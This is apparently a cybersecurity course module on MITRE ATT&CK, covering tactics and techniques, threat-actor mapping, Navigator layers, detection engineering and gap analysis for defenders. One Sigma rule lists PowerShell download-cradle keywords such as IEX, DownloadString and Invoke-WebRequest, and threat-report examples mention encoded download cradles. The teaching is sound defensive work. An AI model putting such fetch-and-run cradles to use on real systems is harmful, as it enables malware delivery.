Opening Framing
Before MITRE ATT&CK, security teams struggled to communicate about adversary behavior. One team called it "lateral movement," another called it "pivoting," a third called it "network propagation." Threat reports used inconsistent terminology. Detection rules couldn't be compared. Defensive gaps were invisible because there was no standard way to map them.
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) changed this by creating a comprehensive, structured knowledge base of adversary behavior. It provides a common vocabulary, a framework for organizing intelligence, and a foundation for measuring defensive coverage. Today, ATT&CK is the de facto standard for describing how adversaries operate.
This week provides a deep dive into ATT&CK: its structure, how to use it for threat intelligence, how to map detections, how to assess defensive gaps, and how to leverage the Navigator tool. You'll learn to use ATT&CK as a practical tool for improving security operations.
Key insight: ATT&CK isn't just a reference—it's an operational tool. Master it, and you gain a superpower for threat analysis and defensive planning.
1) ATT&CK Structure and Components
Understanding ATT&CK's hierarchical structure is essential for effective use:
ATT&CK Hierarchy:
┌─────────────────────────────────────────────────────────────┐
│ MATRICES │
│ Different technology domains: │
│ - Enterprise (Windows, macOS, Linux, Cloud, Network, etc.) │
│ - Mobile (Android, iOS) │
│ - ICS (Industrial Control Systems) │
└─────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ TACTICS (The "Why") │
│ Adversary's tactical goal - what they're trying to achieve │
│ │
│ Enterprise Tactics: │
│ TA0043 Reconnaissance TA0001 Initial Access │
│ TA0042 Resource Development TA0002 Execution │
│ TA0003 Persistence TA0004 Privilege Escalation │
│ TA0005 Defense Evasion TA0006 Credential Access │
│ TA0007 Discovery TA0008 Lateral Movement │
│ TA0009 Collection TA0011 Command and Control │
│ TA0010 Exfiltration TA0040 Impact │
└─────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ TECHNIQUES (The "How") │
│ How adversaries achieve tactical goals │
│ │
│ Example under Persistence (TA0003): │
│ T1547 Boot or Logon Autostart Execution │
│ T1053 Scheduled Task/Job │
│ T1543 Create or Modify System Process │
│ T1136 Create Account │
│ T1505 Server Software Component │
└─────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ SUB-TECHNIQUES (Specific Implementation) │
│ More specific ways to implement a technique │
│ │
│ Example under T1547 Boot or Logon Autostart: │
│ T1547.001 Registry Run Keys / Startup Folder │
│ T1547.002 Authentication Package │
│ T1547.003 Time Providers │
│ T1547.004 Winlogon Helper DLL │
│ T1547.005 Security Support Provider │
│ T1547.009 Shortcut Modification │
└─────────────────────────────────────────────────────────────┘Technique Entry Components:
ATT&CK Technique Entry Structure:
┌─────────────────────────────────────────────────────────────┐
│ TECHNIQUE: T1059.001 - PowerShell │
├─────────────────────────────────────────────────────────────┤
│ TACTIC: Execution (TA0002) │
├─────────────────────────────────────────────────────────────┤
│ DESCRIPTION: │
│ Adversaries may abuse PowerShell commands and scripts for │
│ execution. PowerShell is a powerful interactive command- │
│ line interface and scripting environment... │
├─────────────────────────────────────────────────────────────┤
│ PLATFORMS: Windows │
├─────────────────────────────────────────────────────────────┤
│ PERMISSIONS REQUIRED: User, Administrator │
├─────────────────────────────────────────────────────────────┤
│ DATA SOURCES: │
│ - Command: Command Execution │
│ - Module: Module Load │
│ - Process: Process Creation │
│ - Script: Script Execution │
├─────────────────────────────────────────────────────────────┤
│ DETECTION: │
│ Monitor for execution of PowerShell, especially with │
│ encoded commands, download cradles, or suspicious cmdlets...│
├─────────────────────────────────────────────────────────────┤
│ MITIGATIONS: │
│ M1042 Disable or Remove Feature or Program │
│ M1049 Antivirus/Antimalware │
│ M1045 Code Signing │
│ M1038 Execution Prevention │
│ M1026 Privileged Account Management │
├─────────────────────────────────────────────────────────────┤
│ PROCEDURE EXAMPLES: │
│ - APT29 used PowerShell to execute payloads │
│ - FIN7 uses PowerShell for C2 communication │
│ - Emotet uses PowerShell download cradles │
├─────────────────────────────────────────────────────────────┤
│ REFERENCES: │
│ [Links to research, reports, documentation] │
└─────────────────────────────────────────────────────────────┘Data Sources:
ATT&CK Data Sources:
Data Sources define WHERE to look for evidence:
DS0015 Application Log
├── Application Log Content
DS0017 Command
├── Command Execution
DS0022 File
├── File Access
├── File Creation
├── File Deletion
├── File Metadata
├── File Modification
DS0029 Network Traffic
├── Network Connection Creation
├── Network Traffic Content
├── Network Traffic Flow
DS0009 Process
├── OS API Execution
├── Process Access
├── Process Creation
├── Process Metadata
├── Process Modification
├── Process Termination
DS0024 Windows Registry
├── Windows Registry Key Access
├── Windows Registry Key Creation
├── Windows Registry Key Deletion
├── Windows Registry Key Modification
Using Data Sources:
1. Identify techniques of concern
2. Note required data sources
3. Verify you collect that data
4. Build detections using that data
Example:
Technique: T1547.001 (Registry Run Keys)
Data Source: Windows Registry Key Modification
Collection: Enable registry auditing, EDR telemetry
Detection: Alert on Run key modificationsKey insight: Data sources tell you what visibility you need. If you can't collect the required data source, you can't detect the technique.
2) Using ATT&CK for Threat Intelligence
ATT&CK provides a structured way to document, communicate, and operationalize threat intelligence:
Mapping Threat Reports to ATT&CK:
Step 1: READ the threat report carefully
Step 2: IDENTIFY adversary behaviors described
"The malware establishes persistence via registry run keys"
"Attackers used PowerShell to download additional payloads"
"Data was exfiltrated over HTTPS to cloud storage"
Step 3: MAP to ATT&CK techniques
- Registry run keys → T1547.001
- PowerShell download → T1059.001, T1105
- HTTPS exfiltration → T1041, T1567.002
Step 4: DOCUMENT with context
┌─────────────────────────────────────────────────────────────┐
│ Technique │ Context from Report │
├────────────────┼────────────────────────────────────────────┤
│ T1547.001 │ HKCU\Software\Microsoft\Windows\ │
│ │ CurrentVersion\Run\UpdateSvc │
├────────────────┼────────────────────────────────────────────┤
│ T1059.001 │ PowerShell -enc [base64] download cradle │
├────────────────┼────────────────────────────────────────────┤
│ T1567.002 │ Exfil to legitimate cloud storage service │
└────────────────┴────────────────────────────────────────────┘
Step 5: OPERATIONALIZE
- Create detections for mapped techniques
- Hunt for technique indicators
- Brief stakeholders using ATT&CK languageBuilding Threat Actor Profiles with ATT&CK:
ATT&CK-Based Actor Profile:
APT29 Technique Coverage:
RECONNAISSANCE:
└── T1598.003 Spearphishing Link
INITIAL ACCESS:
├── T1566.001 Spearphishing Attachment
├── T1566.002 Spearphishing Link
├── T1195.002 Compromise Software Supply Chain
└── T1199 Trusted Relationship
EXECUTION:
├── T1059.001 PowerShell
├── T1059.003 Windows Command Shell
└── T1047 Windows Management Instrumentation
PERSISTENCE:
├── T1547.001 Registry Run Keys
├── T1053.005 Scheduled Task
└── T1505.003 Web Shell
PRIVILEGE ESCALATION:
├── T1055 Process Injection
└── T1134 Access Token Manipulation
DEFENSE EVASION:
├── T1027 Obfuscated Files
├── T1070 Indicator Removal
├── T1036 Masquerading
└── T1218 System Binary Proxy Execution
CREDENTIAL ACCESS:
├── T1003.001 LSASS Memory
├── T1558.003 Kerberoasting
└── T1552.001 Credentials in Files
DISCOVERY:
├── T1083 File and Directory Discovery
├── T1057 Process Discovery
└── T1018 Remote System Discovery
LATERAL MOVEMENT:
├── T1021.001 Remote Desktop Protocol
├── T1021.002 SMB/Windows Admin Shares
└── T1021.006 Windows Remote Management
COLLECTION:
├── T1560 Archive Collected Data
└── T1005 Data from Local System
COMMAND AND CONTROL:
├── T1071.001 Web Protocols
├── T1090.004 Domain Fronting
└── T1573 Encrypted Channel
EXFILTRATION:
└── T1041 Exfiltration Over C2 ChannelComparing Threat Actors:
Technique Comparison Matrix:
APT29 │ APT28 │ Lazarus │ FIN7
──────────────────────────┼──────┼───────┼─────────┼──────
T1566.001 Phishing Attach │ ● │ ● │ ● │ ●
T1195.002 Supply Chain │ ● │ │ ● │
T1059.001 PowerShell │ ● │ ● │ ● │ ●
T1053.005 Scheduled Task │ ● │ ● │ ● │ ●
T1003.001 LSASS Memory │ ● │ ● │ ● │ ●
T1021.001 RDP │ ● │ ● │ │ ●
T1090.004 Domain Fronting │ ● │ │ │
T1486 Data Encryption │ │ │ ● │
Common Techniques: T1566.001, T1059.001, T1053.005, T1003.001
- Prioritize detection for techniques used by multiple actors
Unique Techniques:
- APT29: Supply chain, domain fronting
- Lazarus: Destructive capabilities (T1486)
Defensive Implications:
- Common techniques = highest detection priority
- Unique techniques = actor-specific detectionKey insight: ATT&CK enables apples-to-apples comparison of threat actors. You can identify commonalities across actors targeting your sector and prioritize accordingly.
3) ATT&CK Navigator
The ATT&CK Navigator is a web-based tool for visualizing and working with ATT&CK matrices:
Navigator Capabilities:
VISUALIZATION:
┌─────────────────────────────────────────────────────────────┐
│ - View full ATT&CK matrix │
│ - Color-code techniques │
│ - Add scores and comments │
│ - Create custom views │
└─────────────────────────────────────────────────────────────┘
LAYERS:
┌─────────────────────────────────────────────────────────────┐
│ Layers are saved views with: │
│ - Technique selections │
│ - Color coding │
│ - Scores (0-100) │
│ - Comments │
│ - Metadata │
│ │
│ Layer Types: │
│ - Threat actor coverage │
│ - Detection coverage │
│ - Control coverage │
│ - Gap analysis │
│ - Hunt priorities │
└─────────────────────────────────────────────────────────────┘
LAYER OPERATIONS:
┌─────────────────────────────────────────────────────────────┐
│ Combine multiple layers: │
│ │
│ Layer A (Threat Actor TTPs) │
│ + │
│ Layer B (Detection Coverage) │
│ = │
│ Gap Analysis (What we can't detect) │
│ │
│ Operations: Score addition, subtraction, intersection │
└─────────────────────────────────────────────────────────────┘Creating Layers:
Navigator Layer JSON Structure:
{
"name": "APT29 Techniques",
"versions": {
"attack": "14",
"navigator": "4.9.1",
"layer": "4.5"
},
"domain": "enterprise-attack",
"description": "TTPs attributed to APT29",
"techniques": [
{
"techniqueID": "T1566.001",
"tactic": "initial-access",
"color": "#ff6666",
"comment": "Primary initial access via phishing",
"score": 100,
"enabled": true
},
{
"techniqueID": "T1059.001",
"tactic": "execution",
"color": "#ff6666",
"comment": "Heavy PowerShell usage observed",
"score": 90
}
],
"gradient": {
"colors": ["#ffffff", "#ff6666"],
"minValue": 0,
"maxValue": 100
},
"legendItems": [
{"label": "Confirmed", "color": "#ff6666"},
{"label": "Suspected", "color": "#ffcc66"}
]
}
Creating a Layer:
1. Navigate to attack.mitre.org/navigator
2. Create new layer
3. Select techniques (click to highlight)
4. Add colors, scores, comments
5. Export as JSON for reusePractical Navigator Uses:
Use Case 1: Threat Actor Visualization
1. Research actor TTPs from reports
2. Create layer with actor's techniques
3. Color by confidence:
- Red: Confirmed usage
- Orange: Suspected/reported once
- Yellow: Associated tools could enable
4. Share with team for awareness
Use Case 2: Detection Coverage Mapping
1. Inventory existing detections
2. Map each detection to ATT&CK technique
3. Create layer:
- Green: Technique detected
- Yellow: Partial coverage
- Red/blank: No detection
4. Identify gaps for improvement
Use Case 3: Gap Analysis
Layer A: Relevant threat actor TTPs
Layer B: Current detection coverage
Operation: A minus B
Result: Techniques used by threats we can't detect
= Priority detection engineering backlog
Use Case 4: Control Mapping
1. List security controls (EDR, firewall, etc.)
2. Map each control to techniques it addresses
3. Create layer showing control coverage
4. Identify techniques with no control coverage
5. Inform security architecture decisions
Use Case 5: Hunt Prioritization
1. Start with threat actor layer
2. Subtract detection coverage layer
3. Result = Techniques requiring hunting
4. Prioritize hunts based on:
- Actor relevance
- Detection difficulty
- Potential impactKey insight: Navigator layers are shareable artifacts. Create once, share across teams, update as coverage improves.
4) Detection Engineering with ATT&CK
ATT&CK provides a framework for systematic detection development:
ATT&CK-Based Detection Engineering:
Process:
┌─────────────────────────────────────────────────────────────┐
│ 1. PRIORITIZE techniques based on: │
│ - Threat actor relevance │
│ - Current detection gaps │
│ - Data availability │
│ - Detection feasibility │
├─────────────────────────────────────────────────────────────┤
│ 2. RESEARCH the technique: │
│ - Read ATT&CK description │
│ - Review procedure examples │
│ - Study referenced research │
│ - Understand variations │
├─────────────────────────────────────────────────────────────┤
│ 3. IDENTIFY data sources: │
│ - What telemetry is needed? │
│ - Do we collect this data? │
│ - What enrichment helps? │
├─────────────────────────────────────────────────────────────┤
│ 4. DEVELOP detection logic: │
│ - What indicates this technique? │
│ - How to reduce false positives? │
│ - What context improves fidelity? │
├─────────────────────────────────────────────────────────────┤
│ 5. TEST and validate: │
│ - Test against benign activity │
│ - Test against simulated attack │
│ - Tune for environment │
├─────────────────────────────────────────────────────────────┤
│ 6. DOCUMENT: │
│ - ATT&CK technique covered │
│ - Detection logic │
│ - Data sources required │
│ - Known limitations │
│ - Testing results │
└─────────────────────────────────────────────────────────────┘Sigma Rules and ATT&CK:
Sigma Rule with ATT&CK Mapping:
title: Suspicious PowerShell Download Cradle
id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
status: experimental
description: Detects PowerShell download cradles commonly
used for malware delivery
references:
- https://attack.mitre.org/techniques/T1059/001/
- https://attack.mitre.org/techniques/T1105/
author: Security Analyst
date: 2024/03/15
tags:
- attack.execution
- attack.t1059.001
- attack.command_and_control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\powershell.exe'
- Image|endswith: '\pwsh.exe'
selection_commands:
CommandLine|contains:
- 'IEX'
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'iwr '
- 'wget '
- 'curl '
- 'Net.WebClient'
- 'DownloadString'
- 'DownloadFile'
condition: selection_img and selection_commands
falsepositives:
- Legitimate admin scripts
- Software deployment tools
level: high
ATT&CK Coverage:
- T1059.001: PowerShell (Execution)
- T1105: Ingress Tool Transfer (C2)Detection Coverage Assessment:
Measuring Detection Coverage:
Coverage Scoring:
┌────────────────────────────────────────────────────────────┐
│ Score │ Definition │
├───────┼────────────────────────────────────────────────────┤
│ 0 │ No detection capability │
│ 25 │ Minimal: May detect obvious implementations │
│ 50 │ Partial: Detects common implementations │
│ 75 │ Good: Detects most implementations │
│ 100 │ Comprehensive: High confidence detection │
└───────┴────────────────────────────────────────────────────┘
Assessment Questions per Technique:
1. Do we collect required data sources?
2. Do we have detection rules for this technique?
3. Have we tested the detections?
4. What percentage of implementations would we detect?
5. What is our false positive rate?
Coverage Matrix Example:
Technique │ Data │ Rules │ Tested │ Score │
────────────────┼──────┼───────┼────────┼───────┤
T1059.001 PS │ ✓ │ 3 │ ✓ │ 75 │
T1547.001 RegRun│ ✓ │ 2 │ ✓ │ 75 │
T1003.001 LSASS │ ✓ │ 2 │ ✓ │ 50 │
T1055 Injection │ ✓ │ 1 │ ○ │ 25 │
T1090.004 DomFr │ ○ │ 0 │ │ 0 │
Legend: ✓ = Yes, ○ = Partial, blank = No
Improvement Priority:
1. T1090.004 - No coverage, need data source
2. T1055 - Rule exists but untested
3. T1003.001 - Need additional rulesKey insight: ATT&CK-based detection coverage creates a measurable security metric. You can track improvement over time and prioritize detection engineering work.
5) Defensive Gap Analysis
ATT&CK enables systematic identification of defensive gaps against relevant threats:
Gap Analysis Process:
Step 1: IDENTIFY Relevant Threats
┌─────────────────────────────────────────────────────────────┐
│ Consider: │
│ - Threat actors targeting your industry │
│ - Recent campaigns against similar organizations │
│ - Threats mentioned in intelligence requirements │
│ │
│ Create: Combined threat layer in Navigator │
└─────────────────────────────────────────────────────────────┘
Step 2: MAP Current Defenses
┌─────────────────────────────────────────────────────────────┐
│ Document: │
│ - Detection rules and coverage │
│ - Security controls in place │
│ - Visibility (data sources collected) │
│ │
│ Create: Defense coverage layer in Navigator │
└─────────────────────────────────────────────────────────────┘
Step 3: COMPARE Threat vs. Defense
┌─────────────────────────────────────────────────────────────┐
│ Analysis: │
│ - Overlay threat layer on defense layer │
│ - Identify techniques threats use that we don't detect │
│ - Identify techniques with partial coverage │
│ │
│ Result: Prioritized gap list │
└─────────────────────────────────────────────────────────────┘
Step 4: PRIORITIZE Gaps
┌─────────────────────────────────────────────────────────────┐
│ Factors: │
│ - How many relevant threats use this technique? │
│ - How critical is the tactic? (Initial access > Discovery) │
│ - How feasible is improving detection? │
│ - What resources are required? │
│ │
│ Output: Ranked improvement backlog │
└─────────────────────────────────────────────────────────────┘
Step 5: PLAN Improvements
┌─────────────────────────────────────────────────────────────┐
│ For each priority gap: │
│ - What data sources are needed? │
│ - What detection logic required? │
│ - What controls could mitigate? │
│ - What is the implementation timeline? │
│ │
│ Output: Detection engineering roadmap │
└─────────────────────────────────────────────────────────────┘Gap Analysis Example:
Scenario: Financial Services Company
Step 1: Relevant Threats
- FIN7 (financially motivated)
- APT38 (DPRK bank heists)
- Scattered Spider (social engineering)
Combined: 45 unique techniques
Step 2: Current Defenses
- EDR with 60% technique coverage
- SIEM with 40% technique coverage
- Network monitoring: 30% technique coverage
Combined unique coverage: 65%
Step 3: Gap Identification
HIGH-PRIORITY GAPS (used by 2+ actors, no detection):
┌─────────────────────────────────────────────────────────────┐
│ T1566.002 Spearphishing Link │ All 3 actors use │
│ T1204.002 Malicious File │ All 3 actors use │
│ T1055.012 Process Hollowing │ FIN7, APT38 use │
│ T1218.011 Rundll32 │ FIN7, APT38 use │
│ T1070.004 File Deletion │ All 3 actors use │
└─────────────────────────────────────────────────────────────┘
MEDIUM-PRIORITY GAPS (used by 1+ actor, partial detection):
┌─────────────────────────────────────────────────────────────┐
│ T1059.001 PowerShell │ Detected but bypassable │
│ T1003.001 LSASS Memory │ Some implementations │
│ T1021.001 RDP │ Lateral only, not auth │
└─────────────────────────────────────────────────────────────┘
Step 4: Prioritized Roadmap
Q1: Initial Access Detection
- T1566.002: URL analysis, sandbox integration
- T1204.002: Enhanced email security, user training
Q2: Execution/Evasion Detection
- T1055.012: Memory analysis, behavior monitoring
- T1218.011: Application allowlisting, process monitoring
Q3: Anti-Forensics Detection
- T1070.004: File system monitoring, journal analysisControl Gap Analysis:
Mapping Controls to ATT&CK:
Control: Multi-Factor Authentication (MFA)
Techniques Mitigated:
- T1078: Valid Accounts (reduces impact)
- T1110: Brute Force (blocks success)
- T1558: Steal Kerberos Tickets (limits use)
- T1539: Steal Web Session Cookie (reduces impact)
Control: Application Allowlisting
Techniques Mitigated:
- T1059: Command and Scripting Interpreter
- T1204: User Execution
- T1218: System Binary Proxy Execution
- T1053: Scheduled Task/Job (unauthorized)
Control: Network Segmentation
Techniques Mitigated:
- T1021: Remote Services (limits scope)
- T1570: Lateral Tool Transfer (limits scope)
- T1072: Software Deployment Tools (limits scope)
Gap Analysis Question:
"For each high-priority technique gap, what controls
could mitigate if detection is difficult?"
Example:
T1055.012 Process Hollowing
- Detection: Difficult, requires memory analysis
- Control Alternative: Application allowlisting
blocks unauthorized executables
- Recommendation: Implement allowlisting as
compensating control while developing detectionKey insight: Gap analysis combines threat intelligence with defensive assessment. The result is a prioritized, threat- informed improvement roadmap.
Real-World Context
Case Study: Healthcare Ransomware Defense
A healthcare organization used ATT&CK to improve defenses against ransomware. They identified three ransomware groups targeting healthcare: Ryuk, Conti, and BlackCat. Mapping each group's TTPs to ATT&CK revealed 35 common techniques. They assessed current detection coverage: 40% of techniques had solid detection, 30% had partial coverage, 30% had no coverage. The gap analysis identified critical blind spots: T1566.001 (phishing), T1486 (data encrypted), and T1490 (inhibit system recovery). They prioritized improvements: Phase 1 addressed phishing with enhanced email security. Phase 2 added volume shadow copy monitoring. Phase 3 improved credential access detection. Six months later, coverage improved to 75%, and a Ryuk attempt was detected during initial access.
Case Study: Red Team Reporting
A penetration testing firm adopted ATT&CK for reporting. Each finding was mapped to techniques, enabling clients to understand exactly what adversary behaviors succeeded. A Navigator layer accompanied each report showing techniques used, techniques detected, and techniques that succeeded undetected. This transformed reports from "we got domain admin" to "T1078 (valid accounts) via T1110.003 (password spraying) enabled T1003.001 (LSASS) leading to T1021.002 (SMB) lateral movement." Clients could immediately map findings to their detection coverage and prioritize improvements.
ATT&CK Ecosystem:
ATT&CK-Related Resources:
MITRE Projects:
- ATT&CK Navigator: Visualization tool
- ATT&CK Workbench: Customize ATT&CK
- CALDERA: Adversary emulation platform
- CAR: Cyber Analytics Repository (detections)
Community Projects:
- Sigma: Generic detection rules with ATT&CK tags
- Atomic Red Team: Technique testing
- MITRE Engenuity: ATT&CK evaluations
- DeTT&CT: Detection coverage mapping
Vendor Integration:
- Most SIEMs map rules to ATT&CK
- EDR vendors report ATT&CK techniques
- Threat intel platforms use ATT&CK
Research Resources:
- ATT&CK Blog (medium.com/mitre-attack)
- ATT&CKcon presentations
- Academic research citing ATT&CKATT&CK has become the universal language for discussing adversary behavior. Mastering it connects you to a global community of defenders.
Guided Lab: ATT&CK Navigator Layers
In this lab, you'll create multiple ATT&CK Navigator layers and perform gap analysis.
Lab Environment:
- Web browser with ATT&CK Navigator (attack.mitre.org/navigator)
- Threat actor reports (provided)
- Detection inventory (provided scenario)
Exercise Steps:
- Access ATT&CK Navigator and create new Enterprise layer
- Build threat actor layer from provided reports
- Build detection coverage layer from scenario inventory
- Use layer operations to identify gaps
- Prioritize gaps using threat relevance
- Create detection engineering recommendations
- Export and document layers
Reflection Questions:
- What techniques appeared across multiple threat actors?
- Where were the most significant detection gaps?
- How would you prioritize improvement efforts?
Week Outcome Check
By the end of this week, you should be able to:
- Explain ATT&CK structure (matrices, tactics, techniques, sub-techniques)
- Map threat reports and intelligence to ATT&CK techniques
- Create and use ATT&CK Navigator layers
- Perform layer operations for gap analysis
- Develop ATT&CK-based detection engineering priorities
- Assess detection and control coverage using ATT&CK
- Compare threat actors using ATT&CK technique mapping
- Communicate defensive gaps using ATT&CK framework
📚 Building on Prior Knowledge
ATT&CK mapping connects to earlier frameworks and operations:
- CSY101 Week 13 (Threat Modeling): Convert STRIDE threats into ATT&CK techniques.
- CSY104 Week 11 (CVSS): Translate technique impact into risk prioritization.
- CSY204 (SOC/IR): Use ATT&CK to drive detection coverage and triage playbooks.
🎯 Hands-On Labs (Free & Essential)
Practice ATT&CK mapping before moving to reading resources.
🧭 ATT&CK Navigator: Detection Gap Layer
What you'll do: Create a layer highlighting techniques with weak coverage.
Why it matters: Gap analysis drives detection priorities.
Time estimate: 60-90 minutes
🧪 MITRE CAR: Technique-to-Detection Mapping
What you'll do: Map 3 ATT&CK techniques to CAR analytics.
Why it matters: Shows how to translate intel into detections.
Time estimate: 45-60 minutes
📝 Lab Exercise: Advisory-to-ATT&CK Mapping
Task: Map one CISA advisory to ATT&CK techniques and write 3 detection ideas.
Deliverable: Technique list with notes and detection gaps.
Why it matters: Teaches practical translation from reports to action.
Time estimate: 60-90 minutes
🧩 Lab: Supply Chain Technique Mapping
What you'll do: Map supply chain techniques (e.g., T1195) to ATT&CK and
detections.
Deliverable: Technique list with telemetry sources and gaps.
Why it matters: Supply chain defenses require explicit coverage mapping.
Time estimate: 60-90 minutes
💡 Lab Tip: Map techniques to telemetry sources so gaps are measurable.
🧩 Supply Chain Techniques in ATT&CK
ATT&CK includes supply chain techniques and related behaviors. Map them explicitly to avoid blind spots in detections.
Supply chain focus areas:
- T1195 (Supply Chain Compromise)
- Credential access via third-party tools
- Abuse of signed updates or installers
- Trusted relationship misuse📚 Building on CSY101 Week-13: Threat model upstream and downstream trust relationships.
Resources
Lab
Complete the following lab exercises to practice ATT&CK framework application.